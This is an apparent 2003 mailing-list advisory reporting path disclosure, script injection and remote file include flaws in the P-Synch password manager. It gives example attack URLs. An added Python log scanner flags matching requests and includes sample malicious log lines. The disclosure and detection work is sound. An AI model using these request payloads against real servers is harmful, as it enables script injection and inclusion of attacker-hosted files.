Multiple Vulnerabilities In P-Synch Password Management

From: JeiAr (jeiarat_private)
Date: Wed May 28 2003 - 22:26:21 PDT

    Multiple Vulnerabilities In P-Synch Password Management
    -------------------------------------------------------
    The other night I came across a server running P-Synch. 
    I had never heard of it, so I was curious to poke around 
    on it a bit. Within an hour I found the vulns listed below. 
    I'm pretty sure there are other more serious vulns in 
    P-Synch, but they are very picky about who they give their
    software to, even an evaluation version, so I was not able
    to test any further. However, I encourage any admins running
    P-Synch to poke around on it, just to be on the safe side.
    
    
    
    Description
    -------------------------------------------------------
    P-Synch Total Password Management Solution  
    by M-TECH
    P-Synch is a total password management solution. It is 
    intended to reduce the cost of ownership of password systems, 
    and simultaneously improve the security of password protected 
    systems. This is done through:
    
      - Password Synchronization.
      - Enforcing an enterprise wide password strength policy.
      - Allowing authenticated users to reset their own forgotten
        passwords and enable their locked out accounts.
      - Streamlining help desk call resolution for password resets.
    
    P-Synch is available for both internal use, on the corporate 
    Intranet, as well as for the Internet deployment in B2B and 
    B2C applications.
    
    http://www.securityfocus.com/products/837
    
    
    
    Problems
    -------------------------------------------------------
    All of these problems are simple, self-explanatory vulns,
    so I'm sure the below examples will speak for themselves.
    Once again, this application was NOT thoroughly researched.
    So anyone with a copy of P-Synch might wanna explore it
    further.
    
    
    
    Path Disclosure Vulnerability
    -------------------------------------------------------
    https://path/to/psynch/nph-psa.exe?lang=
    https://path/to/psynch/nph-psf.exe?lang=
    
    
    Code Injection Vulnerability
    -------------------------------------------------------
    https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
    https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
    
    
    File Include Vulnerability
    -------------------------------------------------------
    https://path/to/psynch/nph-psf.exe?css=http://somesite/file
    https://path/to/psynch/nph-psa.exe?css=http://somesite/file
    
    
    
    Credits
    -------------------------------------------------------
    All credits go to JeiAr of GulfTech Computers and CSA 
    Security Research http://www.gulftech.org
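
For admins who want to check whether their own P-Synch server has received requests shaped like the three examples in the post, here is an added example (not part of the original message, and not M-TECH code) that scans web access-log lines for them. The Common Log Format, the `/psynch/` path prefix and the sample lines are constructed assumptions; only the CGI names and the `lang` and `css` parameters come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two CGI programs named in the advisory.
PSYNCH_CGI = re.compile(r"/nph-ps[af]\.exe$", re.IGNORECASE)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the advisory patterns a request target matches, sorted."""
    parts = urlsplit(target)
    if not PSYNCH_CGI.search(parts.path):
        return []
    # parse_qs percent-decodes values; keep_blank_values keeps "lang=".
    params = parse_qs(parts.query, keep_blank_values=True)
    found = set()
    if "" in params.get("lang", []):
        found.add("path-disclosure: empty lang")
    for value in params.get("css", []):
        if re.search(r'["<>]', value):
            found.add("injection: markup characters in css")
        if re.match(r"\s*(?:[a-z][a-z0-9+.-]*:)?//", value, re.IGNORECASE):
            found.add("include: css is an absolute URL")
    return sorted(found)

def scan(lines):
    """Return (line number, client, findings) for each matching log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        findings = classify(m.group(2)) if m else []
        if findings:
            hits.append((number, m.group(1), findings))
    return hits

# Constructed sample lines (Common Log Format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2003:10:00:01 -0700] "GET /psynch/nph-psf.exe?lang=en HTTP/1.0" 200 5120',
    '192.0.2.44 - - [29/May/2003:10:02:10 -0700] "GET /psynch/nph-psa.exe?lang= HTTP/1.0" 200 812',
    '192.0.2.44 - - [29/May/2003:10:02:31 -0700] "GET /psynch/nph-psf.exe?css=%22%3E%3Cscript%3E HTTP/1.0" 200 5200',
    '192.0.2.44 - - [29/May/2003:10:03:02 -0700] "GET /psynch/nph-psa.exe?css=http://example.test/file HTTP/1.0" 200 5300',
    '192.0.2.10 - - [29/May/2003:10:04:00 -0700] "GET /index.html?css=http://example.test/x HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
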
    


